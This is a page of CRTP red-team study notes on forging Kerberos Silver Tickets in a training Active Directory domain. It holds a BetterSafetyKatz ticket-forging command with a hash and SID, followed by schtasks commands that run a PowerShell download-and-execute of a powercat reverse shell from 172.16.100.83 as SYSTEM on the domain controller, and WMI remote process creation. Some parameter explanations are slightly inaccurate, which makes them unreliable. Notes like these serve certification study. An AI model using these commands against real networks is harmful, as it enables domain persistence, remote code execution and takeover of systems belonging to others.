🛠️
CRTP Notes
  • 🛠️CRTP Notes
  • ⚙️CRTP Methodology
  • 💡Misc
    • PowerShell Basics
    • Bypass defenses
    • Transfer files
  • 🔨Basic enumeration
    • General
    • Network
    • Protection
  • ⛏️AD Enumeration
    • Gnereral
    • ACL
    • Forests and Trusts
  • 🔪Privilege Escalation
    • Local Privilege Escalation
    • Domain Privilege Escalation
      • Kerberoast
      • AS-REP Roasting
      • Delegations
    • Cross Domain Privilege Escalation
      • Trusts
      • AD CS
      • MSSQL Servers
  • 🏎️Lateral Movement
    • WinRM
    • Credentials Dumping
    • DC Sync
    • Over Pass The Hash
    • Runas
  • 🔧Persistence
    • Kerberos
      • Golden Ticket
      • Silver Ticket
      • Diamond Ticket
    • Skeleton Key
    • DSRM
    • Custom SSP
    • AdminSDHolder
    • Security Descriptors
    • ACL
  • 🛡️Mitigations
  • 📚Resources
    • AD attacking overall
    • Rubeus Guide
    • The Hacker Recipes
Powered by GitBook
On this page
  • Create The Ticket
  • Abusing Services
  • HOST
  • HOST + RPCSS

Was this helpful?

  1. Persistence
  2. Kerberos

Silver Ticket

Silver ticket is signed and encrypted by the hash of service account which makes it a valid TGS ticket.

Create The Ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden 
/User:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648 
/target:dcorp-dc.dollarcorp.moneycorp.local
/service:CIFS /rc4:e9bb4c3d1327e29093dfecab8c2676f6 
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Options

kerberos::golden

Name of the module

/User:Administrator

Username for which the TGT is generated

/domain:

Domain FQDN

/sid:

SID of the domain

/target:

Target server FQDN

/service:

The SPN name of service for which TGS is to be created

/aes256:

AES256 keys of the krbtgt account

/id:500 /groups:512

Optional User and Group RID

/ptt

ptt: inject ticket to current process

/startoffset:0

Optional when the ticket is available in minutes. Use negative for a ticket available from past and a larger number for future.

/endin:600

Optional ticket lifetime in minutes. (default 10 years) The default AD setting is 10 hours = 600 minutes

/renewmax:10080

Optional ticket lifetime with renewal in minutes. (default is 10 years) The default AD setting is 7 days = 100800

Abusing Services

HOST

HOST Service permission allows to create scheduled tasks in remote computers The Silver ticket needs to be created with the NT Hash of the target machine

# Check you have permissions 
schtasks /S dcorp-dc.dollarcorp.moneycorp.local

#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "Job" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.83/powercat.ps1''')'"

#Run created schtask now
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Job"

HOST + RPCSS

With these tickets you can execute WMI in the victim system:

#Check you have permissions 
Invoke-WmiMethod -class win32_operatingsystem -ComputerName dcorp-dc

# Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$Program"

gwmi -class win32_operatingsystem -ComputerName dcorp-dc

Last updated 7 months ago

Was this helpful?

🔧